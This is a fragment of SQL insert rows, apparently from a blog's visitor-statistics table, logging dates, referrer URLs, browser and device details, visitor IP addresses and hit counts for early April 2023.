(30926,'2023-04-02','https://45.92.94.221/blog/','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.69','000',0,1,0),
(30927,'2023-04-02','https://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','195.154.200.197','000',0,127,0),
(30928,'2023-04-02','https://ictbank.ir/blog','Chrome','OS X','91.0.0.0','desktop','Macintosh','','3.145.179.231','000',0,2,0),
(30929,'2023-04-02','https://ictbank.ir/blog','Chrome','Windows','54.0.0.0','desktop','Unknown','','54.84.114.225','000',0,2,0),
(30930,'2023-04-02','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.25.145.40','000',0,1,0),
(30931,'2023-04-02','https://yandex.ru/','Edge','Windows','111.0.0.0','desktop','Unknown','','185.31.165.240','000',0,1,0),
(30932,'2023-04-02','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(30933,'2023-04-02','https://ictbank.ir/blog','Chrome','Windows','85.0.0.0','desktop','Unknown','','186.210.233.117','000',0,11,0),
(30934,'2023-04-02','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','23.235.194.82','000',0,1,0),
(30935,'2023-04-02','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','188.68.47.27','000',0,1,0),
(30936,'2023-04-02','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','124.223.174.224','000',0,1,0),
(30937,'2023-04-02','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','179.43.126.172','000',0,1,0),
(30938,'2023-04-02','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','128.1.79.9','000',0,3,0),
(30939,'2023-04-02','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','3.228.10.164','000',0,1,0),
(30940,'2023-04-03','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(30941,'2023-04-03','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.26','000',0,2,0),
(30942,'2023-04-03','https://ictbank.ir/blog','Chrome','Windows','11.0.0.0','desktop','Unknown','','208.80.194.121','000',0,4,0),
(30943,'2023-04-03','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.235.78.54','000',0,1,0),
(30944,'2023-04-03','https://ictbank.ir/blog','Firefox','Ubuntu','3.0.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(30945,'2023-04-03','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.153.72.12','000',0,1,0),
(30946,'2023-04-03','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(30947,'2023-04-03','https://ictbank.ir/blog','Firefox','Windows','110.0','desktop','Unknown','','51.89.228.207','000',0,2,0),
(30948,'2023-04-03','https://ictbank.ir/hooman/admin/','Chrome','Windows','111.0.0.0','desktop','Unknown','','5.237.165.40','000',0,135,0),
(30949,'2023-04-03','https://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','128.14.224.165','000',0,9,0),
(30950,'2023-04-03','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.210','000',0,1,0),
(30951,'2023-04-03','https://ictbank.ir/blog','Firefox','Windows','103.0','desktop','Unknown','','130.255.166.26','000',0,1,0),
(30952,'2023-04-03','https://ictbank.ir/blog','Firefox','Windows','103.0','desktop','Unknown','','130.255.166.115','000',0,1,0),
(30953,'2023-04-03','https://ictbank.ir/blog','Firefox','Windows','103.0','desktop','Unknown','','130.255.166.79','000',0,2,0),
(30954,'2023-04-03','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','66.97.37.232','000',0,1,0),
(30955,'2023-04-03','https://ictbank.ir/blog','Firefox','Windows','66.0','desktop','Unknown','','51.254.199.11','000',0,2,0),
(30956,'2023-04-03','https://ictbank.ir/blog','Unknown','OS X','Unknown','desktop','Macintosh','','185.39.144.147','000',0,1,0),
(30957,'2023-04-03','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','147.135.129.229','000',0,1,0),
(30958,'2023-04-03','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','141.136.34.205','000',0,1,0),
(30959,'2023-04-03','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(30960,'2023-04-03','https://ictbank.ir/blog','Safari','OS X','5.0','desktop','Macintosh','','208.80.194.122','000',0,2,0),
(30961,'2023-04-03','https://ictbank.ir/blog','Chrome','Windows','108.0.0.0','desktop','Unknown','','142.132.250.173','000',0,1,0),
(30962,'2023-04-03','https://ictbank.ir/blog','Firefox','Windows','103.0','desktop','Unknown','','142.93.81.12','000',0,1,0),
(30963,'2023-04-03','https://ictbank.ir/hooman/admin/index.php','Chrome','Windows','111.0.0.0','desktop','Unknown','','148.113.153.37','000',0,16,0),
(30964,'2023-04-03','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','95.211.87.209','000',0,1,0),
(30965,'2023-04-03','https://ictbank.ir/hooman/admin/index.php','Chrome','Windows','111.0.0.0','desktop','Unknown','','5.237.134.212','000',0,1,0),
(30966,'2023-04-03','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','208.76.87.109','000',0,1,0),
(30967,'2023-04-03','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.72','000',0,2,0),
(30968,'2023-04-03','https://ictbank.ir/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','154.89.5.42','000',0,1,0),
(30969,'2023-04-03','https://ictbank.ir/blog','Chrome','Windows','90.0.0.0','desktop','Unknown','','5.101.156.143','000',0,1,0),
(30970,'2023-04-03','https://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','91.244.12.175','000',0,4,0),
(30971,'2023-04-03','https://ictbank.ir/blog','Chrome','Windows','65.0.0.0','desktop','Unknown','','103.93.160.210','000',0,2,0),
(30972,'2023-04-03','https://ictbank.ir/blog/category/database/','Edge','Windows','90.0.0.0','desktop','Unknown','','37.139.53.30','000',0,12,0),
(30973,'2023-04-03','https://ictbank.ir/blog','Chrome','Windows','65.0.0.0','desktop','Unknown','','204.48.26.148','000',0,2,0),
(30974,'2023-04-03','https://design-arena.ir/blog/','Opera','Windows','53.0.0.0','desktop','Unknown','','191.101.217.64','000',0,1,0),
(30975,'2023-04-03','https://ictbank.ir/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','154.89.5.44','000',0,2,0),
(30976,'2023-04-03','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','23.251.102.74','000',0,1,0),
(30977,'2023-04-04','https://45.92.94.221:443/blog','Edge','Windows','101.0.0.0','desktop','Unknown','','106.75.147.108','000',0,3,0),
(30978,'2023-04-04','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.141','000',0,12,0),
(30979,'2023-04-04','https://ictbank.ir/blog','Chrome','Linux','98.0.0.0','desktop','Unknown','','66.240.192.138','000',0,2,0),
(30980,'2023-04-04','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.126','000',0,5,0),
(30981,'2023-04-04','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(30982,'2023-04-04','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.45','000',0,4,0),
(30983,'2023-04-04','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.141.34','000',0,2,0),
(30984,'2023-04-04','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(30985,'2023-04-04','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,2,0),
(30986,'2023-04-04','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.137','000',0,1,0),
(30987,'2023-04-04','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.210','000',0,1,0),
(30988,'2023-04-04','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','185.27.99.126','000',0,1,0),
(30989,'2023-04-04','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','185.27.99.137','000',0,2,0),
(30990,'2023-04-04','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','185.27.99.136','000',0,1,0),
(30991,'2023-04-04','https://yandex.ru/','Chrome','Windows','111.0.0.0','desktop','Unknown','','95.29.228.132','000',0,1,0),
(30992,'2023-04-04','https://ictbank.ir/blog','Chrome','OS X','111.0.0.0','desktop','Macintosh','','65.108.233.81','000',0,2,0),
(30993,'2023-04-04','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.134.170','000',0,2,0),
(30994,'2023-04-04','https://ictbank.ir/blog','Chrome','Windows','12.0.0.0','desktop','Unknown','','208.80.194.122','000',0,4,0),
(30995,'2023-04-04','https://ictbank.ir/blog','Chrome','Windows','71.0.0.0','desktop','Unknown','','77.74.177.119','000',0,1,0),
(30996,'2023-04-04','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','45.141.215.44','000',0,2,0),
(30997,'2023-04-04','https://ictbank.ir/blog','Chrome','Linux','103.0.0.0','desktop','Unknown','','49.83.22.3','000',0,5,0),
(30998,'2023-04-04','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(30999,'2023-04-04','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','184.168.98.87','000',0,1,0),
(31000,'2023-04-04','https://ictbank.ir/hooman/admin/','Chrome','Windows','111.0.0.0','desktop','Unknown','','31.7.105.47','000',0,88,0),
(31001,'2023-04-04','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','185.141.106.60','000',0,1,0),
(31002,'2023-04-04','https://45.92.94.221:443/blog','Chrome','Windows','110.0.0.0','desktop','Unknown','','54.174.211.110','000',0,6,0),
(31003,'2023-04-04','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','180.149.125.163','000',0,1,0),
(31004,'2023-04-04','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.202.40.98','000',0,1,0),
(31005,'2023-04-04','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','111.0.0.0','desktop','Unknown','','5.237.129.14','000',0,2,0),
(31006,'2023-04-04','https://ictbank.ir/blog/about-me/','Chrome','Windows','90.0.0.0','desktop','Unknown','','37.139.53.30','000',0,2,0),
(31007,'2023-04-04','https://ictbank.ir/blog','Firefox','OS X','80.0','desktop','Macintosh','','185.163.109.66','000',0,3,0),
(31008,'2023-04-04','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.209.242','000',0,1,0),
(31009,'2023-04-04','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','192.3.232.23','000',0,2,0),
(31010,'2023-04-04','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.172.235.222','000',0,1,0),
(31011,'2023-04-04','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','92.204.139.118','000',0,1,0),
(31012,'2023-04-04','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','152.89.196.13','000',0,1,0),
(31013,'2023-04-05','https://45.92.94.221:443/blog','Firefox','OS X','10.0.0','desktop','Macintosh','','106.75.164.148','000',0,4,0),
(31014,'2023-04-05','https://ictbank.ir/blog','Firefox','Ubuntu','3.0.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(31015,'2023-04-05','https://ictbank.ir/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','152.32.252.184','000',0,1,0),
(31016,'2023-04-05','https://ictbank.ir/blog','Android Browser','Android','Unknown','tablet','Unknown','','8.142.165.189','000',0,2,0),
(31017,'2023-04-05','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(31018,'2023-04-05','https://ictbank.ir/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','101.36.107.222','000',0,1,0),
(31019,'2023-04-05','https://ictbank.ir/blog','Chrome','Android','81.0.0.0','mobile:smart','Nexus 5','','124.221.186.82','000',0,2,0),
(31020,'2023-04-05','https://www.ictbank.ir/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','118.193.32.180','000',0,1,0),
(31021,'2023-04-05','https://ictbank.ir/blog','Chrome','Windows','85.0.0.0','desktop','Unknown','','43.153.220.18','000',0,43,0),
(31022,'2023-04-05','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','3.238.3.82','000',0,1,0),
(31023,'2023-04-05','https://l.instagram.com/','Instagram','iOS','274.0.0.0.0','mobile:smart','iPhone 13 Pro','','190.2.146.139','000',0,1,0),
(31024,'2023-04-05','https://ictbank.ir/blog','Firefox','Windows','117.0','desktop','Unknown','','195.146.37.212','000',0,1,0),
(31025,'2023-04-05','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','93.90.200.43','000',0,1,0),
(31026,'2023-04-05','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.122','000',0,3,0),
(31027,'2023-04-05','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(31028,'2023-04-05','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,2,0),
(31029,'2023-04-05','https://45.92.94.221:443/blog','Chrome','Windows','94.0.0.0','desktop','Unknown','','106.75.157.131','000',0,4,0),
(31030,'2023-04-05','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.122.10.105','000',0,1,0),
(31031,'2023-04-05','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','52.12.196.194','000',0,1,0),
(31032,'2023-04-05','https://45.92.94.221:443/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.7','000',0,2,0),
(31033,'2023-04-05','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.16','000',0,1,0),
(31034,'2023-04-05','https://ictbank.ir/blog','Firefox','Windows','38.0','desktop','Unknown','','103.130.219.197','000',0,3,0),
(31035,'2023-04-05','https://ictbank.ir/blog','Firefox','Linux','73.0','desktop','Unknown','','165.227.122.128','000',0,1,0),
(31036,'2023-04-05','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.184.210.222','000',0,1,0),
(31037,'2023-04-05','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','132.145.39.16','000',0,7,0),
(31038,'2023-04-05','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.137','000',0,2,0),
(31039,'2023-04-05','https://ictbank.ir/blog','Chrome','Linux','5.0.0.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(31040,'2023-04-05','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(31041,'2023-04-05','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.79','000',0,1,0),
(31042,'2023-04-05','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Pixel','','139.99.68.31','000',0,42,0),
(31043,'2023-04-05','https://www.google.com/','Firefox','Windows','111.0','desktop','Unknown','','86.57.115.249','000',0,1,0),
(31044,'2023-04-06','https://ictbank.ir/blog','Firefox','Windows','111.0','desktop','Unknown','','86.57.115.249','000',0,1,0),
(31045,'2023-04-06','https://ictbank.ir/blog','Firefox','Windows','5.0','desktop','Unknown','','208.80.194.122','000',0,4,0),
(31046,'2023-04-06','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,16,0),
(31047,'2023-04-06','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','154.209.125.115','000',0,3,0),
(31048,'2023-04-06','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,2,0),
(31049,'2023-04-06','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.137','000',0,1,0),
(31050,'2023-04-06','https://ictbank.ir/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','101.36.107.222','000',0,1,0),
(31051,'2023-04-06','https://ictbank.ir/blog','Chrome','Windows','111.0.0.0','desktop','Unknown','','5.78.102.105','000',0,304,0),
(31052,'2023-04-06','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','216.172.168.108','000',0,1,0),
(31053,'2023-04-06','https://ictbank.ir/blog','Firefox','Windows','9.0.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(31054,'2023-04-06','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','111.0.0.0','desktop','Unknown','','5.237.184.254','000',0,109,0),
(31055,'2023-04-06','https://search.brave.com/','Chrome','Windows','109.0.0.0','desktop','Unknown','','5.128.203.152','000',0,1,0),
(31056,'2023-04-06','https://ictbank.ir/blog','Chrome','OS X','14.0.0.0','desktop','Macintosh','','208.80.194.121','000',0,2,0),
(31057,'2023-04-06','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(31058,'2023-04-06','https://ictbank.ir/blog','Chrome','OS X','111.0.0.0','desktop','Macintosh','','194.26.135.17','000',0,4,0),
(31059,'2023-04-06','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.184.248.77','000',0,1,0),
(31060,'2023-04-06','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','4.234.130.68','000',0,1,0),
(31061,'2023-04-06','https://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','192.71.44.44','000',0,1,0),
(31062,'2023-04-06','https://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','192.36.52.37','000',0,1,0),
(31063,'2023-04-06','https://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','192.71.36.158','000',0,1,0),
(31064,'2023-04-06','https://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','192.71.30.89','000',0,1,0),
(31065,'2023-04-06','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,2,0),
(31066,'2023-04-06','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.26','000',0,2,0),
(31067,'2023-04-06','https://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','91.244.12.175','000',0,8,0),
(31068,'2023-04-06','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','213.238.201.239','000',0,1,0),
(31069,'2023-04-06','https://ictbank.ir/hooman/admin/index.php','Chrome','Windows','111.0.0.0','desktop','Unknown','','5.237.137.18','000',0,16,0),
(31070,'2023-04-06','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.212.169.122','000',0,1,0),
(31071,'2023-04-06','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.133.58','000',0,1,0),
(31072,'2023-04-06','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','92.118.39.109','000',0,2,0),
(31073,'2023-04-06','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Redmi Note 9 Pro','','192.42.116.177','000',0,1,0),
(31074,'2023-04-06','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','148.72.206.105','000',0,1,0),
(31075,'2023-04-06','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','91.134.248.192','000',0,1,0),
(31076,'2023-04-06','https://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','103.230.142.243','000',0,2,0),
(31077,'2023-04-06','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.79','000',0,2,0),
(31078,'2023-04-06','https://l.instagram.com/','Instagram','iOS','251.0.0.0.0','mobile:smart','iPhone 12 Pro Max','','185.185.51.36','000',0,1,0),
(31079,'2023-04-06','https://duckduckgo.com/','Chrome','Windows','112.0.0.0','desktop','Unknown','','95.239.150.141','000',0,1,0),
(31080,'2023-04-07','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,16,0),
(31081,'2023-04-07','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','45.141.215.44','000',0,2,0),
(31082,'2023-04-07','https://ictbank.ir/blog','Chrome','OS X','111.0.0.0','desktop','Macintosh','','194.26.135.17','000',0,8,0),
(31083,'2023-04-07','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.72','000',0,2,0),
(31084,'2023-04-07','https://yandex.ru/','Yandex Browser','Windows','23.0.0.0','desktop','Unknown','','95.189.186.100','000',0,1,0),
(31085,'2023-04-07','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(31086,'2023-04-07','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','92.118.39.109','000',0,2,0),
(31087,'2023-04-07','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.172.235.222','000',0,1,0),
(31088,'2023-04-07','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.137','000',0,1,0),
(31089,'2023-04-07','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,2,0),
(31090,'2023-04-07','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.42','000',0,5,0),
(31091,'2023-04-07','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','154.209.125.115','000',0,3,0),
(31092,'2023-04-07','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','107.180.109.32','000',0,1,0),
(31093,'2023-04-07','https://ictbank.ir/blog','Chrome','Windows','10.0.0.0','desktop','Unknown','','208.80.194.122','000',0,3,0),
(31094,'2023-04-07','http://ictbank.ir','Firefox','Ubuntu','65.0','desktop','Unknown','','80.234.34.116','000',0,1,0),
(31095,'2023-04-07','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.26','000',0,2,0),
(31096,'2023-04-07','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','176.58.101.195','000',0,1,0),
(31097,'2023-04-07','https://45.92.94.221/blog','Unknown','Linux','Unknown','desktop','Unknown','','54.39.49.180','000',0,2,0),
(31098,'2023-04-07','https://ictbank.ir/blog','Firefox','Ubuntu','3.0.0','desktop','Unknown','','208.80.194.126','000',0,4,0),
(31099,'2023-04-07','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.209.46','000',0,1,0),
(31100,'2023-04-07','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','170.106.176.34','000',0,2,0),
(31101,'2023-04-07','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','178.79.142.51','000',0,1,0),
(31102,'2023-04-07','https://ictbank.ir/blog','Internet Explorer','Windows','11.0','desktop','','','174.91.71.53','000',0,4,0),
(31103,'2023-04-07','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,2,0),
(31104,'2023-04-07','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','52.32.51.140','000',0,1,0),
(31105,'2023-04-07','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','157.230.89.169','000',0,4,0),
(31106,'2023-04-07','https://ictbank.ir/blog','Firefox','Ubuntu','2.0.0.0','desktop','Unknown','','98.159.226.72','000',0,3,0),
(31107,'2023-04-07','https://ictbank.ir/blog','Firefox','Ubuntu','2.0.0.0','desktop','Unknown','','98.159.226.70','000',0,2,0),
(31108,'2023-04-07','https://ictbank.ir/blog','Firefox','Ubuntu','2.0.0.0','desktop','Unknown','','98.159.226.69','000',0,4,0),
(31109,'2023-04-07','https://ictbank.ir/blog','Firefox','Ubuntu','2.0.0.0','desktop','Unknown','','98.159.226.73','000',0,1,0),
(31110,'2023-04-07','https://ictbank.ir/blog','Firefox','Ubuntu','2.0.0.0','desktop','Unknown','','98.159.226.71','000',0,1,0),
(31111,'2023-04-07','https://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','159.89.42.187','000',0,2,0),
(31112,'2023-04-07','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','172.174.8.60','000',0,1,0),
(31113,'2023-04-07','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','178.79.137.135','000',0,1,0),
(31114,'2023-04-07','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','34.205.53.88','000',0,1,0),
(31115,'2023-04-07','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(31116,'2023-04-07','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.218.223.97','000',0,2,0),
(31117,'2023-04-07','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','139.162.249.139','000',0,1,0),
(31118,'2023-04-07','https://ns2.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.136.78','000',0,2,0),
(31119,'2023-04-07','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','80.251.219.111','000',0,1,0),
(31120,'2023-04-07','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','203.150.228.102','000',0,1,0),
(31121,'2023-04-07','https://ictbank.ir/blog','Opera','Windows','8.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(31122,'2023-04-07','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','66.33.212.110','000',0,1,0),
(31123,'2023-04-07','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','170.106.159.64','000',0,2,0),
(31124,'2023-04-07','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.60','000',0,2,0),
(31125,'2023-04-07','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','121.5.79.247','000',0,1,0),
(31126,'2023-04-07','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.134.170','000',0,2,0),
(31127,'2023-04-07','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','144.126.140.17','000',0,1,0),
(31128,'2023-04-08','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','166.62.122.244','000',0,1,0),
(31129,'2023-04-08','https://ictbank.ir/blog','Chrome','OS X','14.0.0.0','desktop','Macintosh','','208.80.194.121','000',0,4,0),
(31130,'2023-04-08','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,16,0),
(31131,'2023-04-08','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.194','000',0,1,0),
(31132,'2023-04-08','https://ictbank.ir/blog/','Chrome','Windows','103.0.0.0','desktop','Unknown','','46.191.184.223','000',0,6,0),
(31133,'2023-04-08','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.210','000',0,2,0),
(31134,'2023-04-08','https://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','44.204.245.16','000',0,127,0),
(31135,'2023-04-08','https://ictbank.ir/blog','Chrome','Windows','96.0.0.0','desktop','Unknown','','158.140.127.203','000',0,1,0),
(31136,'2023-04-08','https://ictbank.ir/blog','Chrome','OS X','110.0.0.0','desktop','Macintosh','','5.78.74.222','000',0,43,0),
(31137,'2023-04-08','https://ictbank.ir/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.182','000',0,1,0),
(31138,'2023-04-08','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','65.109.16.39','000',0,1,0),
(31139,'2023-04-08','https://yandex.ru/','Chrome','Windows','111.0.0.0','desktop','Unknown','','95.161.221.105','000',0,1,0),
(31140,'2023-04-08','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','154.209.125.115','000',0,3,0),
(31141,'2023-04-08','https://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(31142,'2023-04-08','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.135.158.169','000',0,1,0),
(31143,'2023-04-08','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','81.0.0.0','desktop','Unknown','','185.119.81.105','000',0,6,0),
(31144,'2023-04-08','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','52.27.34.225','000',0,1,0),
(31145,'2023-04-08','https://ictbank.ir/blog','Chrome','OS X','111.0.0.0','desktop','Macintosh','','194.26.135.17','000',0,4,0),
